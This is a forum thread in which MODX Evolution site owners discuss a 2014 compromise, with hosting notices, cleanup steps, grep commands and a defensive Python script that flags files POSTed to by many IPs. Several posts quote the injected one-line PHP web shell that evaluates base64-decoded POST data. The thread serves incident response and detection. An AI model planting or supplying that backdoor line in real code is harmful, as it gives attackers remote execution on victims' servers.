    • 15362
    • 22 Posts
    Hello modxers!!

    I got an email from my hosting company saying that they detected malicious files on my server.

    I am using modx evolution 1.14 (latest version) and nothing more.

    Here is the message

    "The malicious code detected is similar to:

    Files containing content similar to the following:

    <?php eval(base64_decode($_POST['<random_string_here>']));?>

    These are malicious scripts that allow for remote execution of malware and spam by unauthorized users. Generally these are POSTed to, which then causes other compromises on your account. We have cleaned this particular string of code off your account, but we recommend you review your account in and around the directories where the listed files are to check for further malware."

    Are they right or not?

    Thanks in advance!!!
      • 3749
      • 24,544 Posts
      MODX does contain files with base64_encode and base64_decode in them, but the files they refer to could still be malicious files that are not part of MODX. You'd have to look at the actual files.
        Did I help you? Buy me a beer
        Get my Book: MODX:The Official Guide
        MODX info for everyone: http://bobsguides.com/modx.html
        My MODX Extras
        Bob's Guides is now hosted at A2 MODX Hosting
        • 48536
        • 5 Posts
        We had the same issue yesterday on about 10 modx (different versions) evolution websites on different servers.
        They are not modx files, or added to existing modx files. We cleaned everything, but didn't find where it came from!

        We do think it could be a vulnerability of MODX, mostly they were added to tinyMCE directories.
        There was no ftp access on those websites.

        • For what it's worth, I think there may be a zero-day out in the wild for Evo... I've seen too many of these pop up on my sites, even when things are supposedly patched. That's just my own paranoia, but the kosher line is to clean things out and restore from "known-good" copies of everything. I outlined this in an article here: http://tipsfor.us/2013/01/14/help-my-site-was-hacked/
            • 48536
            • 5 Posts
            This is what I did:

            1. Identify the hacked websites (ssh): find /home -iname '*.php' | xargs grep "eval(base64_decode(" -s1
            2. Backup all data (files/mysql)
            3. Changed all passwords (mysql/ftp etc.)
            4. Deleted all the modx files, re-installed modx version 1.0.14 and returned all data (files/mysql)

            A time consuming but secure solution, in my opinion.
              • 48544
              • 2 Posts
              Same here. Many projects were compromised. Different modx evolution versions.
              This code was found in many files:
              <?php eval(base64_decode($_POST['<random_string_here>']));?>

                • 48536
                • 5 Posts
                Watch out: as mentioned, new files were added with the code!
                But existing files are modified on top with the code!

                It seems a big problem. Is there anybody who knows how they got in?
                It doesn't seem that it's done by ftp but by upload.
                So there should be a leak in the files of modx...

                  • 48548
                  • 4 Posts
                  This affected our servers on the weekend. The above mentioned script hacks queued around 127,000 SPAM emails to our server in 24 hours and caused all sorts of load issues.

                  The interesting thing here is the oldest of these scripts dates right back to October 2012, it was just sitting there all this time. Then recently around 60 copies of it were created or existing scripts modified all through the directories.

                  This is what was added as an example:

                  <?php eval(base64_decode($_POST['na04af1'])); ?>

                  The $_POST variable is usually different across different sites.

                  I haven't been able to ascertain the entry point for these scripts at this time but it does appear to be from a web request to MODx. These files were not uploaded through SFTP/FTP.

                  This has also hugely affected a partner company we work with, across six servers, all hacks were affecting old versions of Evolution only from what we can see so far.
                  • That looks like it was receiving commands from a botnet controller.
                      Studying MODX in the desert - http://sottwell.com
                      Tips and Tricks from the MODX Forums and Slack Channels - http://modxcookbook.com
                      Join the Slack Community - http://modx.org
                      • 48548
                      • 4 Posts
                      Quote from: sottwell at Aug 11, 2014, 02:07 AM
                      That looks like it was receiving commands from a botnet controller.

                      It definitely was. Looking at the access logs I can see a tonne of different IP addresses posting to the scripts with that line at the top (usually).

                      The entry point where all of this code was injected to the server is still unknown.
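                      The pattern the poster describes, many unrelated IP addresses POSTing to the dropped scripts, can be pulled out of the access logs automatically. The script below is an added example, not code from the thread: it parses combined-format log lines and lists every .php path that received POSTs from at least a given number of distinct client addresses. The sample log lines are constructed for the example and are not the poster's logs; the threshold of three distinct IPs is an assumption to tune per site.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format; fields after the status/size are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def post_targets(lines, min_distinct_ips=3):
    """Return {path: sorted distinct client IPs} for .php paths that received
    POSTs from at least min_distinct_ips different addresses. A dropped shell
    driven by a botnet, as in this thread, shows up as one path hit by many
    unrelated IPs; a real form is normally posted by few IPs per hour."""
    posters = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST":
            path = rec["path"].split("?")[0]
            if path.endswith(".php"):
                posters[path].add(rec["ip"])
    return {p: sorted(ips) for p, ips in posters.items() if len(ips) >= min_distinct_ips}

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Aug/2014:22:01:03 +0000] "POST /assets/plugins/tinymce/na04af1.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Aug/2014:22:01:09 +0000] "POST /assets/plugins/tinymce/na04af1.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Aug/2014:22:02:41 +0000] "POST /assets/plugins/tinymce/na04af1.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [10/Aug/2014:22:03:00 +0000] "GET /index.php?id=2 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Aug/2014:22:04:15 +0000] "POST /manager/index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Aug/2014:22:05:27 +0000] "POST /contact.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

def suspicious_in_sample():
    """Run the check over the constructed sample log."""
    return post_targets(SAMPLE_LOG.splitlines())

if __name__ == "__main__":
    for path, ips in suspicious_in_sample().items():
        print(f"{path}: POSTed by {len(ips)} distinct IPs: {', '.join(ips)}")
```

On a real server, feed post_targets the lines of access.log and compare the flagged paths against the file scan results.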